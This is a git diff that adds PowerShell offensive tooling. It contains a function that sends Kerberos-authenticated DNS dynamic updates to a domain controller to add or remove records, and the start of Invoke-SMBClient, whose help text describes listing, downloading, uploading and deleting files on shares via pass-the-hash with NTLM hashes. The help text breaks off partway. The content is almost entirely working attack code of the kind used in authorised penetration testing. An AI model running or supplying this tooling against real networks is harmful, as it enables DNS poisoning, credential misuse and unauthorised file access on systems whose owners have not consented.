+ $name_start = 0
+
+ ForEach ($index in $index_array)
+ {
+ $name_end = $index - $name_start
+ [Byte[]]$name_array += $name_end
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start,$name_end))
+ $name_start = $index + 1
+ }
+
+ [Byte[]]$name_array += ($name.Length - $name_start)
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
+ }
+ else
+ {
+ [Byte[]]$name_array = $name.Length
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
+ }
+
+ return $name_array
+ }
+
+ function New-PacketDNSQuery
+ {
+ param([Byte[]]$name,[byte[]]$type,[Byte[]]$apreq)
+
+ [Byte[]]$transaction_id = New-RandomByteArray 2
+
+ if($apreq)
+ {
+ $mechtoken_length = Get-ASN1LengthArrayLong ($apreq.Count)
+ $mechtoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + 1)
+ $innercontexttoken_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + 17) # 31
+ $innercontexttoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
+ $innercontexttoken_length.Count + 18)
+ $spnego_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
+ $innercontexttoken_length.Count + $innercontexttoken_length2.Count + 27)
+ $grouped_length = $apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + $innercontexttoken_length.Count +
+ $innercontexttoken_length2.Count + $spnego_length.Count + 25
+ $key_size = [System.BitConverter]::GetBytes($grouped_length + 3)[1,0]
+ $rd_length = [System.BitConverter]::GetBytes($grouped_length + $key_size.Count + 27)[1,0]
+ $inception = [int64](([datetime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
+ $inception = [System.BitConverter]::GetBytes($inception)
+ $inception = $inception[3..0]
+ }
+
+ if($apreq)
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($grouped_length + $name.Count + 57)[1,0]
+ }
+ else
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($name.Count + 16)[1,0]
+ }
+
+ $packet_DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_DNSQuery.Add("Length",$length)
+ $packet_DNSQuery.Add("TransactionID",$transaction_ID)
+ $packet_DNSQuery.Add("Flags",[Byte[]](0x00,0x00))
+ $packet_DNSQuery.Add("Questions",[Byte[]](0x00,0x01))
+ $packet_DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00))
+ $packet_DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00))
+
+ if($apreq)
+ {
+ $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x01))
+ }
+ else
+ {
+ $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00))
+ }
+
+ $packet_DNSQuery.Add("Queries_Name",$name)
+ $packet_DNSQuery.Add("Queries_Type",$type)
+ $packet_DNSQuery.Add("Queries_Class",[Byte[]](0x00,0xff))
+
+ if($apreq)
+ {
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_Name",[Byte[]](0xc0,0x0c))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_Type",[Byte[]](0x00,0xf9))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_Class",[Byte[]](0x00,0xff))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RDLength",$rd_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Algorithm",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Inception",$inception)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Expiration",$inception)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Mode",[Byte[]](0x00,0x03))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Error",[Byte[]](0x00,0x00))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_KeySize",$key_size)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_Encoding",[Byte[]](0x60) + $spnego_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_ThisMech",[Byte[]](0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_Encoding",[Byte[]](0xa0) + $innercontexttoken_length2 + [Byte[]](0x30) +
+ $innercontexttoken_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechTypes_Encoding",[Byte[]](0xa0,0x0d,0x30,0x0b))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechType0",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Encoding",[Byte[]](0xa2) + $mechtoken_length2 + [Byte[]](0x04) +
+ $mechtoken_length)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Token",$apreq)
+ $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_OtherSize",[Byte[]](0x00,0x00))
+ }
+
+ return $packet_DNSQuery
+ }
+
+ function New-PacketDNSUpdate
+ {
+ param([Byte[]]$transaction_ID,[String]$zone,[String]$name,[String]$type,[Int]$TTL,[Int]$preference,[Int]$priority,[Int]$weight,[Int]$port,[String]$data,[Byte[]]$time_signed,[Byte[]]$tkey_name,[Byte[]]$MAC)
+
+ if($data)
+ {
+ $add = $true
+ [Byte[]]$class = 0x00,0x01
+ }
+ else
+ {
+ [Byte[]]$class = 0x00,0xff
+ $TTL = 0
+ }
+
+ switch ($type)
+ {
+
+ 'A'
+ {
+ [Byte[]]$type = 0x00,0x01
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
+ }
+
+ }
+
+ 'AAAA'
+ {
+ [Byte[]]$type = 0x00,0x1c
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
+ }
+
+ }
+
+ 'CNAME'
+ {
+ [Byte[]]$type = 0x00,0x05
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
+ }
+
+ }
+
+ 'MX'
+ {
+ $MX = $true
+ [Byte[]]$type = 0x00,0x0f
+
+ if($data)
+ {
+ $extra_length = 2
+ [Byte[]]$preference = [System.Bitconverter]::GetBytes($preference)[1,0]
+ }
+
+ if($data -and [Bool]($data -as [System.Net.IPAddress]))
+ {
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+ elseif($data)
+ {
+ [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
+ }
+
+ }
+
+ 'PTR'
+ {
+ [Byte[]]$type = 0x00,0x0c
+
+ if($data)
+ {
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+
+ }
+
+ 'SRV'
+ {
+ $SRV = $true
+ [Byte[]]$type = 0x00,0x21
+
+ if($data)
+ {
+ [Byte[]]$priority = [System.Bitconverter]::GetBytes($priority)[1,0]
+ [Byte[]]$weight = [System.Bitconverter]::GetBytes($weight)[1,0]
+ [Byte[]]$port = [System.Bitconverter]::GetBytes($port)[1,0]
+ $extra_length = 6
+ [Byte[]]$data = (New-DNSNameArray $data) + 0x00
+ }
+
+ }
+
+ 'TXT'
+ {
+ $TXT = $true
+ [Byte[]]$type = 0x00,0x10
+ [Byte[]]$TXT_length = [System.BitConverter]::GetBytes($data.Length)[0]
+
+ if($data)
+ {
+ $extra_length = 1
+ [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
+ }
+
+ }
+
+ }
+
+ if($name -eq $zone)
+ {
+ [Byte[]]$name = 0xc0,0x0c
+ }
+ else
+ {
+ [Byte[]]$name = (New-DNSNameArray ($name -replace ('.' + $zone),'')) + 0xc0,0x0c
+ #[Byte[]]$name = (New-DNSNameArray $name) + 0x00
+ }
+
+ [Byte[]]$zone = (New-DNSNameArray $zone) + 0x00
+ [Byte[]]$TTL = [System.Bitconverter]::GetBytes($TTL)[3..0]
+ [Byte[]]$data_length = [System.BitConverter]::GetBytes($data.Length + $extra_length)[1,0]
+
+ if($MAC)
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + $tkey_name.Count + $MAC.Count + 62 + $extra_length)[1,0]
+ }
+ elseif(!$tkey_name)
+ {
+ [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + 26 + $extra_length)[1,0]
+ }
+
+ $packet_DNSUpdate = New-Object System.Collections.Specialized.OrderedDictionary
+
+ if(!$tkey_name -or $MAC)
+ {
+ $packet_DNSUpdate.Add("Length",$length)
+ }
+
+ $packet_DNSUpdate.Add("TransactionID",$transaction_ID)
+ $packet_DNSUpdate.Add("Flags",[Byte[]](0x28,0x00))
+ $packet_DNSUpdate.Add("Zones",[Byte[]](0x00,0x01))
+ $packet_DNSUpdate.Add("Prerequisites",[Byte[]](0x00,0x00))
+ $packet_DNSUpdate.Add("Updates",[Byte[]](0x00,0x01))
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRRs",[Byte[]](0x00,0x01))
+ }
+ else
+ {
+ $packet_DNSUpdate.Add("AdditiionalRRs",[Byte[]](0x00,0x00))
+ }
+
+ $packet_DNSUpdate.Add("Zone_Name",$zone)
+ $packet_DNSUpdate.Add("Zone_Type",[Byte[]](0x00,0x06))
+ $packet_DNSUpdate.Add("Zone_Class",[Byte[]](0x00,0x01))
+ $packet_DNSUpdate.Add("Updates_Name",$name)
+ $packet_DNSUpdate.Add("Updates_Type",$type)
+ $packet_DNSUpdate.Add("Updates_Class",$class)
+ $packet_DNSUpdate.Add("Updates_TTL",$TTL)
+ $packet_DNSUpdate.Add("Updates_DataLength",$data_length)
+
+ if($MX)
+ {
+ $packet_DNSUpdate.Add("Updates_TXTLength",$preference)
+ }
+
+ if($TXT -and $add)
+ {
+ $packet_DNSUpdate.Add("Updates_TXTLength",$TXT_length)
+ }
+
+ if($SRV -and $add)
+ {
+ $packet_DNSUpdate.Add("Updates_Priority",$priority)
+ $packet_DNSUpdate.Add("Updates_Weight",$weight)
+ $packet_DNSUpdate.Add("Updates_Port",$port)
+ }
+
+ if($add)
+ {
+ $packet_DNSUpdate.Add("Updates_Address",$data)
+ }
+
+ if($tkey_name)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_Name",$tkey_name)
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_Type",[Byte[]](0x00,0xfa))
+ }
+
+ $packet_DNSUpdate.Add("AdditionalRecords_Class",[Byte[]](0x00,0xff))
+ $packet_DNSUpdate.Add("AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_DataLength",[Byte[]](0x00,0x36))
+ }
+
+ $packet_DNSUpdate.Add("AdditionalRecords_AlgorithmName",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
+ $packet_DNSUpdate.Add("AdditionalRecords_TimeSigned",$time_signed)
+ $packet_DNSUpdate.Add("AdditionalRecords_Fudge",[Byte[]](0x01,0x2c))
+
+ if($MAC)
+ {
+ $packet_DNSUpdate.Add("AdditionalRecords_MACSize",[Byte[]](0x00,0x1c))
+ $packet_DNSUpdate.Add("AdditionalRecords_MAC",$MAC)
+ $packet_DNSUpdate.Add("AdditionalRecords_OriginalID",$transaction_ID)
+ }
+
+ $packet_DNSUpdate.Add("AdditionalRecords_Error",[Byte[]](0x00,0x00))
+ $packet_DNSUpdate.Add("AdditionalRecords_OtherLength",[Byte[]](0x00,0x00))
+ }
+
+ return $packet_DNSUpdate
+ }
+
+ function New-PacketDNSUpdateMAC
+ {
+ param([Byte[]]$flags,[Byte[]]$sequence_number,[Byte[]]$checksum)
+
+ $packet_DNSUpdateMAC = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_TokenID",[Byte[]](0x04,0x04))
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Flags",$flags)
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Filler",[Byte[]](0xff,0xff,0xff,0xff,0xff))
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_SequenceNumber",[Byte[]](0x00,0x00,0x00,0x00) + $sequence_number)
+
+ if($checksum)
+ {
+ $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Checksum",$checksum)
+ }
+
+ return $packet_DNSUpdateMAC
+ }
+
+ function Get-DNSUpdateResponseStatus
+ {
+ param([Byte[]]$DNS_client_receive)
+
+ $DNS_response_flags = [System.BitConverter]::ToString($DNS_client_receive[4..5])
+ $DNS_response_flags = $DNS_response_flags -replace "-",""
+
+ switch ($DNS_response_flags)
+ {
+ 'A800' {$DNS_update_response_status = "[+] DNS update successful"}
+ 'A801' {$DNS_update_response_status = ("[-] format error 0x" + $DNS_response_flags)}
+ 'A802' {$DNS_update_response_status = ("[-] failed to complete 0x" + $DNS_response_flags)}
+ 'A804' {$DNS_update_response_status = ("[-] not implemented 0x" + $DNS_response_flags)}
+ 'A805' {$DNS_update_response_status = ("[-] update refused 0x" + $DNS_response_flags)}
+ Default {$DNS_update_response_status = ("[-] DNS update was not successful 0x" + $DNS_response_flags)}
+ }
+
+ return $DNS_update_response_status
+ }
+
+ $DNS_client = New-Object System.Net.Sockets.TCPClient
+ $DNS_client.Client.ReceiveTimeout = 3000
+
+ if($Security -ne 'Secure')
+ {
+
+ try
+ {
+ $DNS_client.Connect($DomainController,"53")
+ }
+ catch
+ {
+ Write-Output "$DomainController did not respond on TCP port 53"
+ }
+
+ if($DNS_client.Connected)
+ {
+ $DNS_client_stream = $DNS_client.GetStream()
+ $DNS_client_receive = New-Object System.Byte[] 2048
+ [Byte[]]$transaction_id = New-RandomByteArray 2
+ $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData
+ [Byte[]]$DNSUpdate = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
+ $DNS_client_send = $DNSUpdate
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
+ Write-Output $DNS_update_response_status
+ $DNS_client.Close()
+ $DNS_client_stream.Close()
+ }
+
+ }
+
+ if($Security -eq 'Secure' -or ($Security -eq 'Auto' -and $DNS_update_response_status -like '*0xA805'))
+ {
+ $tkey = "6" + ((0..9) | Get-Random -Count 2) + "-ms-7.1-" + ((0..9) | Get-Random -Count 4) + "." + ((0..9) | Get-Random -Count 8) +
+ "-" + ((0..9) | Get-Random -Count 4) + "-11e7-" + ((0..9) | Get-Random -Count 4) + "-000c296694e0"
+ $tkey = $tkey -replace " ",""
+ Write-Verbose "[+] TKEY name $tkey"
+ [Byte[]]$tkey_name = [System.Text.Encoding]::UTF8.GetBytes($tkey)
+ $tkey_name = [Byte[]]0x08 + $tkey_name + 0x00
+ $tkey_name[9] = 0x06
+ $tkey_name[16] = 0x24
+
+ if($kerberos_tcpclient)
+ {
+ $kerberos_client = New-Object System.Net.Sockets.TCPClient
+ $kerberos_client.Client.ReceiveTimeout = 3000
+ $domain_controller = [System.Text.Encoding]::UTF8.GetBytes($DomainController)
+ $kerberos_username = [System.Text.Encoding]::UTF8.GetBytes($Username)
+ $kerberos_realm = [System.Text.Encoding]::UTF8.GetBytes($Realm)
+
+ try
+ {
+ $kerberos_client.Connect($DomainController,"88")
+ }
+ catch
+ {
+ Write-Output "$DomainController did not respond on TCP port 88"
+ }
+
+ }
+
+ if(!$kerberos_tcpclient -or $kerberos_client.Connected)
+ {
+
+ if($kerberos_tcpclient)
+ {
+
+ if($Hash)
+ {
+ $base_key = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
+ $base_key = $base_key.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $base_key = Get-KerberosAES256BaseKey $salt $password
+ }
+
+ $ke_key = Get-KerberosAES256UsageKey encrypt 1 $base_key
+ $ki_key = Get-KerberosAES256UsageKey integrity 1 $base_key
+ $nonce = New-RandomByteArray 4
+ $kerberos_client_stream = $kerberos_client.GetStream()
+ $kerberos_client_receive = New-Object System.Byte[] 2048
+ $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce
+ $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
+ $kerberos_client_send = $AS_REQ
+ $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
+ $kerberos_client_stream.Flush()
+ $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
+ [Byte[]]$PAC_Timestamp = New-KerberosPACTimestamp $ke_key
+ [Byte[]]$PAC_ENC_Timestamp = Protect-KerberosAES256CTS $ke_key $PAC_Timestamp
+ [Byte[]]$PAC_Timestamp_Signature = Get-KerberosHMACSHA1 $ki_key $PAC_Timestamp
+ $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce $PAC_ENC_Timestamp $PAC_Timestamp_Signature
+ $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
+ $kerberos_client_send = $AS_REQ
+ $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
+ $kerberos_client_stream.Flush()
+ $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
+ $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
+ $asrep_payload = $asrep_payload -replace "-",""
+ $kerberos_client.Close()
+ $kerberos_client_stream.Close()
+ }
+ else
+ {
+
+ try
+ {
+
+ $Null = [System.Reflection.Assembly]::LoadWithPartialName("System.IdentityModel")
+
+ if($username)
+ {
+ $creds = New-Object System.Management.Automation.PSCredential ($username,$Password)
+ $network_creds = $creds.GetNetworkCredential()
+ $network_creds.Domain = $domain
+ $token = New-Object System.IdentityModel.Selectors.KerberosSecurityTokenProvider ("DNS/$DomainController",[System.Security.Principal.TokenImpersonationLevel]::Impersonation,$network_creds)
+ $ticket = $token.GetToken([System.TimeSpan]::FromMinutes(1))
+ }
+ else
+ {
+ $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ("DNS/$DomainController")
+ }
+
+ $asrep_key = $ticket.SecurityKey.GetSymmetricKey()
+ $kerberos_client_receive = $Ticket.GetRequest()
+ $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
+ $asrep_payload = $asrep_payload -replace "-",""
+ }
+ catch
+ {
+ $auth_success = $false
+ }
+
+ }
+
+ if($asrep_key -or ($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302010B*'))
+ {
+ Write-Verbose "[+] Kerberos preauthentication successful"
+ $auth_success = $true
+ }
+ elseif($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302011E*')
+ {
+ Write-Output ("[-] Kerberos preauthentication error 0x" + $asrep_payload.Substring(96,2))
+ $auth_success = $false
+ }
+ else
+ {
+ Write-Output "[-] Kerberos authentication failure"
+ $auth_success = $false
+ }
+
+ if($auth_success)
+ {
+ $ticket_index = $asrep_payload.IndexOf("A003020112A1030201")
+ $ticket_kvno = $kerberos_client_receive[($ticket_index / 2 + 9)]
+
+ if($asrep_payload.Substring($ticket_index + 22,2) -eq '82')
+ {
+ $ticket_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($ticket_index / 2 + 13)..($ticket_index / 2 + 12)],0)) - 4
+ }
+ else
+ {
+ $ticket_length = $kerberos_client_receive[($ticket_index / 2 + 12)] - 3
+ }
+
+ $ticket = $Kerberos_client_receive[($ticket_index / 2 + 18)..($ticket_index/2 + 17 + $ticket_length)]
+
+ if($kerberos_tcpclient)
+ {
+ $cipher_index = $asrep_payload.Substring($ticket_index + 1).IndexOf("A003020112A1030201") + $ticket_index + 1
+
+ if($asrep_payload.Substring($cipher_index + 22,2) -eq '82')
+ {
+ $cipher_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($cipher_index / 2 + 13)..($cipher_index / 2 + 12)],0)) - 4
+ }
+ else
+ {
+ $cipher_length = $kerberos_client_receive[($cipher_length / 2 + 12)] - 3
+ }
+
+ $cipher = $kerberos_client_receive[($cipher_index / 2 + 18)..($cipher_index / 2 + 17 + $cipher_length)]
+ $ke_key = Get-KerberosAES256UsageKey encrypt 3 $base_key
+ $asrep_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
+ $kerberos_session_key = $asrep_cleartext[37..68]
+ $ke_key = Get-KerberosAES256UsageKey encrypt 11 $kerberos_session_key
+ $ki_key = Get-KerberosAES256UsageKey integrity 11 $kerberos_session_key
+ [Byte[]]$subkey = New-RandomByteArray 32
+ [Byte[]]$sequence_number = New-RandomByteArray 4
+ $packet_authenticator = New-KerberosAuthenticator $kerberos_realm $kerberos_username $subkey $sequence_number
+ [Byte[]]$authenticator = ConvertFrom-PacketOrderedDictionary $packet_authenticator
+ $authenticator = (New-RandomByteArray 16) + $authenticator
+ $authenticator_encrypted = Protect-KerberosAES256CTS $ke_key $authenticator
+ $authenticator_signature = Get-KerberosHMACSHA1 $ki_key $authenticator
+ $packet_apreq = New-PacketKerberosAPREQ $kerberos_realm $domain_controller $ticket_kvno $ticket $authenticator_encrypted $authenticator_signature
+ [Byte[]]$apreq = ConvertFrom-PacketOrderedDictionary $packet_apreq
+ [Byte[]]$mac_flags = 0x04
+ }
+ else
+ {
+ [Byte[]]$apreq = $kerberos_client_receive
+ [Byte[]]$mac_flags = 0x00
+ }
+
+ $packet_DNSQuery = New-PacketDNSQuery $tkey_name 0x00,0xf9 $apreq
+ $DNSQueryTKEY = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery
+ $DNS_client = New-Object System.Net.Sockets.TCPClient
+ $DNS_client.Client.ReceiveTimeout = 3000
+
+ try
+ {
+ $DNS_client.Connect($DomainController,"53")
+ }
+ catch
+ {
+ Write-Output "$DomainController did not respond on TCP port 53"
+ }
+
+ if($DNS_client.Connected)
+ {
+ $DNS_client_stream = $DNS_client.GetStream()
+ $DNS_client_receive = New-Object System.Byte[] 2048
+ $DNS_client_send = $DNSQueryTKEY
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $tkey_payload = [System.BitConverter]::ToString($DNS_client_receive)
+ $tkey_payload = $tkey_payload -replace "-",""
+
+ if($tkey_payload.Substring(8,4) -eq '8000')
+ {
+ Write-Verbose "[+] Kerberos TKEY query successful"
+ $TKEY_success = $true
+ }
+ else
+ {
+ Write-Output ("[-] Kerberos TKEY query error 0x" + $tkey_payload.Substring(8,4))
+ $TKEY_success = $false
+ }
+
+ if($TKEY_success)
+ {
+
+ if($kerberos_tcpclient)
+ {
+ $cipher_index = $tkey_payload.IndexOf("A003020112A2")
+ $cipher_length = $DNS_client_receive[($cipher_index / 2 + 8)]
+ $cipher = $DNS_client_receive[($cipher_index / 2 + 9)..($cipher_index / 2 + 8 + $cipher_length)]
+ $ke_key = Get-KerberosAES256UsageKey encrypt 12 $kerberos_session_key
+ $tkey_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
+ $acceptor_subkey = $tkey_cleartext[59..90]
+ }
+ else
+ {
+ $sequence_index = $tkey_payload.IndexOf("FFFFFFFFFF00000000")
+ $sequence_number = $DNS_client_receive[($sequence_index / 2 + 9)..($sequence_index / 2 + 12)]
+ $acceptor_subkey = $asrep_key
+ }
+
+ $kc_key = Get-KerberosAES256UsageKey checksum 25 $acceptor_subkey
+ $time_signed = [Int](([DateTime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
+ $time_signed = [System.BitConverter]::GetBytes($time_signed)
+ $time_signed = 0x00,0x00 + $time_signed[3..0]
+ [Byte[]]$transaction_id = New-RandomByteArray 2
+ $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name
+ [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
+ $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number
+ [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
+ $DNSUpdateTSIG += $DNSUpdateMAC
+ $checksum = Get-KerberosHMACSHA1 $kc_key $DNSUpdateTSIG
+ $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number $checksum
+ [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
+ $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name $DNSUpdateMAC
+ [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
+ $DNS_client_send = $DNSUpdateTSIG
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
+ Write-Output $DNS_update_response_status
+ $DNS_client.Close()
+ $DNS_client_stream.Close()
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+}
diff --git a/Invoke-SMBClient.ps1 b/Invoke-SMBClient.ps1
new file mode 100644
index 0000000..1db92e5
--- /dev/null
+++ b/Invoke-SMBClient.ps1
@@ -0,0 +1,2773 @@
+function Invoke-SMBClient
+{
+<#
+.SYNOPSIS
+Invoke-SMBClient performs basic file share tasks with pass the hash. This module supports SMB2 (2.1) only with and
+without SMB signing. Note that this client is slow compared to the Windows client.
+
+.PARAMETER Username
+Username to use for authentication.
+
+.PARAMETER Domain
+Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the
+username.
+
+.PARAMETER Hash
+NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
+
+.Parameter Action
+Default = List: (List/Recurse/Delete/Get/Put) Action to perform.
+List: Lists the contents of a directory.
+Recurse: Lists the contents of a directory and all subdirectories.
+Delete: Deletes a file.
+Get: Downloads a file.
+Put: Uploads a file and sets the creation, access, and last write times to match the source file.
+
+.PARAMETER Source
+List and Recurse: UNC path to a directory.
+Delete: UNC path to a file.
+Get: UNC path to a file.
+Put: File to upload. If a full path is not specified, the file must be in the current directory. When using the
+'Modify' switch, 'Source' must be a byte array.
+
+.PARAMETER Destination
+List and Recurse: Not used.
+Delete: Not used.
+Get: If used, value will be the new filename of downloaded file. If a full path is not specified, the file will be
+created in the current directory.
+Put: UNC path for uploaded file. The filename must be specified.
+
+.PARAMETER Modify
+List and Recurse: The function will output an object consisting of directory contents.
+Delete: Not used.
+Get: The function will output a byte array of the downloaded file instead of writing the file to disk. It's
+advisable to use this only with smaller files and to send the output to a variable.
+Put: Uploads a byte array to a new destination file.
+
+.PARAMETER NoProgress
+List and Recurse: Not used.
+Delete: Not used.
+Get and Put: Prevents displaying of a progress bar.
+
+.PARAMETER Sleep
+Default = 100 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try increasing this
+if downloaded files are being corrupted.
+
+.PARAMETER Session
+Inveigh-Relay authenticated session.
+
+.EXAMPLE
+List the contents of a root share directory.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose
+
+.EXAMPLE
+Recursively list the contents of a share starting at the root.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share
+
+.EXAMPLE
+Recursively list the contents of a share subdirectory and return only the contents output to a variable.
+$directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify
+
+.EXAMPLE
